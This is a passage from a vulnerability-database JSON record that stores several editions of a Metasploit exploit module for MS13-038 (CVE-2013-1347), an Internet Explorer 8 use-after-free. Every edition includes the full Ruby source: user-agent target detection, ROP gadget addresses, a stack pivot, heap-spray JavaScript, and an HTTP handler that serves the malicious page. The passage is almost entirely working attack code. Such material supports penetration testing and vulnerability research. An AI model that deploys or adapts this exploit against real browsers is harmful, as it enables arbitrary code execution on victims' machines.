(!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-20T17:53:54", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-23T11:50:32", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-23T11:50:32"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-23T11:50:32", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-23T13:50:48", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-23T13:50:48"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-23T13:50:48", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-03T12:06:03", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-03T12:06:03"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-03T12:06:03", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-04T14:16:18", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-04T14:16:18"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => 